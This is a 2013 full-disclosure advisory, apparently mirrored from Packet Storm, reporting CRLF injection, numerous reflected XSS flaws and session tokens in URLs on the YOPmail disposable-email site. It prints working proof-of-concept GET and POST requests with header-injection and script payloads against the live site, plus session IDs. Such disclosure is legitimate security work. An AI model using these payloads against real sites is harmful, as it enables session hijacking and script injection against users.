Lucene search
K

YOPMail XSS / Injection / HTTP Response Splitting

🗓️ 28 Jun 2013 00:00:00Reported by Juan Carlos GarciaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 58 Views

YOPMail CRLF Injection-HTTP Response Splitting and XS

Code
`YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL  
==================================================================================================================================================  
  
  
Report-Timeline:  
================  
2013-06-01: Researcher Notification   
2013-06-03: RESPONSE  
2013-06-07: Ask About the issues  
2013-06-10: Vendor Feedback  
2013-06-13: Not Fixed  
2013-06-16: Ask About the Issues  
2013-06-27: Not Fixed / Not Response  
2013-06-28: Full Disclosure  
  
  
I-VULNERABILITIES  
======================  
  
#Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL /  
  
#Vendor:http://www.yopmail.com  
  
#Author:Juan Carlos García (@secnight)  
  
#Follow me   
http://www.highsec.es  
http://hackingmadrid.blogspot.com  
Twitter:@secnight  
  
  
II-Introduction:  
======================  
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days.   
It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are   
  
downloadable. There are alternate domains.  
  
Domains  
  
@yopmail.fr  
@yopmail.net  
@cool.fr.nf  
@jetable.fr.nf  
@nospam.ze.tc  
@nomail.xl.cx  
@mega.zik.dj  
@speed.1s.fr  
@courriel.fr.nf  
@moncourrier.fr.nf  
@monemail.fr.nf  
@monmail.fr.nf  
@mail.mezimages.net  
The site has new domains every three months.  
  
  
III-PROOF OF CONCEPT  
======================  
  
CRLF INJECTION-HTTP RESPONSE SPLITING  
______________________________________  
  
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers   
  
are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user   
  
defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks  
  
Attacks  
-------  
  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717  
  
  
Multiple CROSS SITE SCRIPTING  
_______________________________  
  
The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a   
  
manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.  
  
Attacks  
--------  
  
Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS..  
  
Affected items  
/add-domain.php   
/alternate-domains.php   
/alternate-email-address.php   
/conditions.php   
/contact.php   
/definitions/email-jetable.php   
/definitions/mail-anonyme.php   
/definitions/spam.php   
/donation.php   
/email-anonyme.php   
/email-generator.php   
/en   
/en/add-domain.php   
/en/alternate-domains.php   
/en/alternate-email-address.php   
/en/conditions.php   
/en/contact.php   
/en/definitions   
/en/definitions/email-jetable.php   
/en/definitions/mail-anonyme.php   
/en/definitions/spam.php   
/en/donation.php   
/en/email-anonyme.php   
/en/email-generator.php   
/en/faq.php   
/en/images   
/en/index.php   
/en/plugins.php   
/en/privacy.php   
/en/send-mail.php   
/en/style   
/en/style/pic   
/en/yopmail-chat.php   
/es   
/es/add-domain.php   
/es/alternate-domains.php   
/es/alternate-email-address.php   
/es/conditions.php   
/es/contact.php   
/es/definitions   
/es/definitions/email-jetable.php   
/es/definitions/mail-anonyme.php   
/es/definitions/spam.php   
/es/donation.php   
/es/email-anonyme.php   
/es/email-generator.php   
/es/faq.php   
/es/images   
/es/index.php   
/es/plugins.php   
/es/privacy.php   
/es/send-mail.php   
/es/style   
/es/style/pic   
/es/yopmail-chat.php   
/faq.php   
/fr   
/fr/add-domain.php   
/fr/alternate-domains.php   
/fr/alternate-email-address.php   
/fr/conditions.php   
/fr/contact.php   
/fr/definitions   
/fr/definitions/email-jetable.php   
/fr/definitions/mail-anonyme.php   
/fr/definitions/spam.php   
/fr/donation.php   
/fr/email-anonyme.php   
/fr/email-generator.php   
/fr/faq.php   
/fr/images   
/fr/index.php   
/fr/plugins.php   
/fr/privacy.php   
/fr/send-mail.php   
/fr/style   
/fr/style/pic   
/fr/yopmail-chat.php   
/index.php   
/it   
/it/add-domain.php   
/it/alternate-domains.php   
/it/alternate-email-address.php   
/it/conditions.php   
/it/contact.php   
/it/definitions   
/it/definitions/email-jetable.php   
/it/definitions/mail-anonyme.php   
/it/definitions/spam.php   
/it/donation.php   
/it/email-anonyme.php   
/it/email-generator.php   
/it/faq.php   
/it/images   
/it/index.php   
/it/plugins.php   
/it/privacy.php   
/it/send-mail.php   
/it/style   
/it/style/pic   
/it/yopmail-chat.php   
/pl   
/pl/add-domain.php   
/pl/alternate-domains.php   
/pl/alternate-email-address.php   
/pl/conditions.php   
/pl/contact.php   
/pl/definitions   
/pl/definitions/email-jetable.php   
/pl/definitions/mail-anonyme.php   
/pl/definitions/spam.php   
/pl/donation.php   
/pl/email-anonyme.php   
/pl/email-generator.php   
/pl/faq.php   
/pl/images   
/pl/index.php   
/pl/plugins.php   
/pl/privacy.php   
/pl/send-mail.php   
/pl/style   
/pl/style/pic   
/pl/yopmail-chat.php   
/plugins.php   
/privacy.php   
/ru   
/ru/add-domain.php   
/ru/alternate-domains.php   
/ru/alternate-email-address.php   
/ru/conditions.php   
/ru/contact.php   
/ru/definitions   
/ru/definitions/email-jetable.php   
/ru/definitions/mail-anonyme.php   
/ru/definitions/spam.php   
/ru/donation.php   
/ru/email-anonyme.php   
/ru/email-generator.php   
/ru/faq.php   
/ru/images   
/ru/index.php   
/ru/plugins.php   
/ru/privacy.php   
/ru/send-mail.php   
/ru/style   
/ru/style/pic   
/ru/yopmail-chat.php   
/send-mail.php   
/uk   
/uk/add-domain.php   
/uk/alternate-domains.php   
/uk/alternate-email-address.php   
/uk/conditions.php   
/uk/contact.php   
/uk/definitions   
/uk/definitions/email-jetable.php   
/uk/definitions/mail-anonyme.php   
/uk/definitions/spam.php   
/uk/donation.php   
/uk/email-anonyme.php   
/uk/email-generator.php   
/uk/faq.php   
/uk/images   
/uk/index.php   
/uk/plugins.php   
/uk/privacy.php   
/uk/send-mail.php   
/uk/style   
/uk/style/pic   
/uk/yopmail-chat.php   
/yopmail-chat.php   
/zh   
/zh/add-domain.php   
/zh/alternate-domains.php   
/zh/alternate-email-address.php   
/zh/conditions.php   
/zh/contact.php   
/zh/definitions   
/zh/definitions/email-jetable.php   
/zh/definitions/mail-anonyme.php   
/zh/definitions/spam.php   
/zh/donation.php   
/zh/email-anonyme.php   
/zh/email-generator.php   
/zh/faq.php   
/zh/images   
/zh/index.php   
/zh/plugins.php   
/zh/privacy.php   
/zh/send-mail.php   
/zh/style   
/zh/style/pic   
/zh/yopmail-chat.php   
  
Method GET  
----------  
  
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec  
  
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec  
  
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid  
  
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E  
  
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E  
  
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E  
  
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E  
  
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E  
  
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E  
  
Method POST  
------------  
  
http://www.yopmail.com:80/send-mail.php  
  
Request Data  
  
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-  
  
1oiflzkn&[email protected]&[email protected]&[email protected]  
  
http://www.yopmail.com:80/send-mail.php  
  
Request Data  
  
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-  
  
dj9fvk3&[email protected]&[email protected]&[email protected]  
  
http://www.yopmail.com:80/send-mail.php  
  
Request Data  
  
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-  
  
7ov0wsxm&[email protected]&[email protected]&[email protected]  
  
http://www.yopmail.com:80/zh/send-mail.php  
  
Request Data  
  
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt  
  
%28939071%29%20bad%3d%22&[email protected]&[email protected]  
  
http://www.yopmail.com:80/zh/send-mail.php  
  
Request Data  
  
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-  
  
0ojziwig&[email protected]&[email protected]&[email protected]  
  
  
SESSION TOKEN IN URL  
____________________  
  
This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL.   
  
URLs could be logged or leaked via the Referer header.  
  
Affected items  
--------------  
  
/cr.php (78a3a31e275b316f36665b35eb4bfe21)   
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)   
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)   
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)   
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
  
Examples  
  
Method GET  
----------  
  
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&  
  
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
Method POST  
-----------  
  
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
Request Data  
  
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-  
  
1oiflzkn&[email protected]&[email protected]&[email protected]  
  
  
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
Request Data  
  
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-  
  
1oiflzkn&[email protected]&[email protected]&[email protected]  
  
  
  
IV. CREDITS  
-------------------------  
  
This vulnerabilities has been discovered  
by Juan Carlos García(@secnight)  
  
  
V. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation